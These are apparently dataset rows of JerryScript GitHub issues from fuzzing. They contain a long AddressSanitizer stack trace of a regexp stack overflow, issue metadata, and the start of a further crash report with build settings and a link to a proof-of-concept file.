#28 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#29 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#30 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#31 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#32 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#33 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#34 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#35 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#36 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#37 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#38 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#39 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#40 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#41 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#42 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#43 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#44 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#45 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#46 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#47 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#48 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#49 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#50 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#51 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#52 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#53 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#54 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#55 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#56 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#57 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#58 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#59 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#60 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#61 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#62 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#63 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#64 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#65 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#66 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#67 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#68 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#69 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#70 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#71 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#72 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#73 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#74 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#75 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#76 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#77 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#78 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#79 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#80 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#81 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#82 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#83 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#84 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#85 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#86 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#87 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#88 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#89 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#90 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#91 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#92 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#93 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#94 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#95 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#96 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#97 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#98 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#99 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#100 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#101 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#102 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#103 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#104 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#105 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#106 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#107 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#108 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#109 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#110 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#111 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#112 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#113 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#114 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#115 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#116 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#117 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#118 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#119 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#120 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#121 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#122 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#123 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#124 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#125 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#126 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#127 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#128 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#129 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#130 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#131 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#132 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#133 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#134 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#135 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#136 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#137 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#138 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#139 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#140 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#141 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#142 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#143 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#144 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#145 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#146 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#147 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#148 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#149 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#150 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#151 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#152 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#153 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#154 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#155 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#156 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#157 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#158 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#159 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#160 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#161 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#162 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#163 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#164 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#165 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#166 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#167 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#168 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#169 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#170 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#171 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#172 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#173 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#174 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#175 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#176 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#177 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#178 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#179 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#180 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#181 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#182 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#183 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#184 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#185 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#186 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#187 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#188 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#189 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#190 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#191 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#192 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#193 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#194 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#195 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#196 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#197 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#198 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#199 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#200 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#201 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#202 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#203 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#204 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#205 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#206 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#207 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#208 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#209 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#210 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#211 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#212 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#213 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#214 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#215 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#216 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#217 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#218 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#219 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#220 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#221 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#222 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#223 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#224 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#225 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#226 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#227 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#228 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#229 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#230 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#231 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#232 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#233 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#234 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#235 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#236 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#237 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#238 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#239 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#240 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#241 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#242 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#243 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#244 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#245 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#246 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#247 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#248 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#249 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
#250 0x8142841 in ecma_regexp_run /home/keven/Fuzzing/jerry-test/jerry-core/ecma/operations/ecma-regexp-object.c:816
SUMMARY: AddressSanitizer: stack-overflow /home/keven/Fuzzing/jerry-test/jerry-core/parser/regexp/re-bytecode.c:187 re_decode_u32
==123642==ABORTING | Stack overflow at re_decode_u32 jerry-core/parser/regexp/re-bytecode.c:187 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4302/comments | 1 | 2020-10-20T06:58:59Z | 2020-10-22T08:36:47Z | https://github.com/jerryscript-project/jerryscript/issues/4302 | 725,267,387 | 4,302 |
[
"jerryscript-project",
"jerryscript"
]
| # Build environment:
Ubuntu 16.04
gcc 5.4.0
jerry version: 6f25d6e
build command: python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on
test command: ./xst poc
# Target device:
Desktop Linux
# POC
[jerry-001439.txt](https://github.com/jerryscript-project/jerryscript/files/5406811/jerry-001439.txt)
# Description
Below is the ASAN outputs.
ASAN:SIGSEGV
